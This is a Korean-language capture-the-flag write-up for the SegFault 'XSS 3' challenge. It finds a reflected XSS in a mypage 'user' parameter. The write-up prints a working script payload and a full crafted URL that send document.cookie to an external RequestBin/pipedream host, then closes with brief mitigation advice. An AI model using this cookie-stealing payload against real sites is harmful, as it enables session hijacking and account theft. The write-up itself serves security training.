[SegFault] (XSS) - XSS 3

[SegFault] (XSS)

XSS 3

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지에 접속하면 다음과 같은 페이지가 나온다.

해당 페이지의 입력값에 대하여 변조가 가능한지 확인해본 결과 유저명이 변조하는 대로 그대로 출력되는 것을 확인할 수 있었다.

그러므로 다음과 같이 특수기호를 추가하여 입력이 가능한 지 확인해본다.

XSS Point

gear<' ">

그 결과 다음과 같이 입력이 그대로 반사되는 것을 확인할 수 있었다.

---

풀이 과정 (해결 방안)

유저명이 조작 가능한 것을 확인하였고 이에 따라 그대로 입력값이 노출되는 것을 확인하였으므로 페이로드(Payload)를 작성한다.

페이로드(Payload)

gear"/><script>var cookieData = document.cookie;
var i = new Image();
i.src = "https://공격자 주소/cookie="+cookieData;
</script>//

해당 페이로드를 URL에 입력하기 위해서는 다음과 같이 입력해줘야 한다.

gear"/><script>var+cookieData=document.cookie;var+i=new+Image();i.src="https://eneqijtbrtwyr.x.pipedream.net/?cookie="%2BcookieData;</script>//

위와 같이 입력해주는 경우 아래와 같은 요청이 가게되는 것을 확인할 수 있다.

그 결과 다음과 같이 원하는 스크립트가 활성화 되어 있는 것을 확인할 수 있다.

 

스크립트 전달(URL)

해당 파라미터가 담긴 요청의 경우 GET Method에 해당하기 때문에 이에 대하여 다음과 같이 URL을 생성할 수 있다.

http://ctf.segfaulthub.com:4343/xss_3/mypage.php?user=gear"/><script>var+cookieData=document.cookie;var+i=new+Image();i.src="https://eneqijtbrtwyr.x.pipedream.net/?cookie="%2BcookieData;</script>//

위의 URL을 클릭하도록 유도하여 XSS가 발생하도록 하는 것이 가능하다.

따라서 해당 URL을 관리자 Bot에 보내준다.

탈취된 쿠키(Cookie)가 공격자 주소(RequestBin)으로 받아와 지는 것을 확인할 수 있다.

위와 같이 마이페이지의 user 파라미터를 변조하는 일련의 과정을 담은 URL로의 접속 유도를 통하여 원하는 flag가 획득된 것을 확인하였다.

---

취약점에 관한 고찰

본 문제의 경우 마이페이지에 존재하는 유저명에 해당하는 파라미터의 값이 변조가 가능하고, 이에 따라 입력되는 값의 응답(Response)에 그대로 반사되어 노출되는 것을 이용한 Reflected XSS 취약점이다.

마이페이지와 같이 중요정보가 담겨 있는 페이지의 경우 user에 해당하는 파라미터가 변조가 가능한 경우 다른 이용자의 정보가 유출될 가능성이 존재한다. 따라서 본인에 해당하는 유저명을 제외한 입력 값에 대하여 수용하지 않도록하여, 입력값을 변조된 값으로 출력하지 않고 기존의 유저명으로 되돌리거나, 입력이 불가능한 Read Only 속성을 적용하는 등의 조치를 취해야 한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영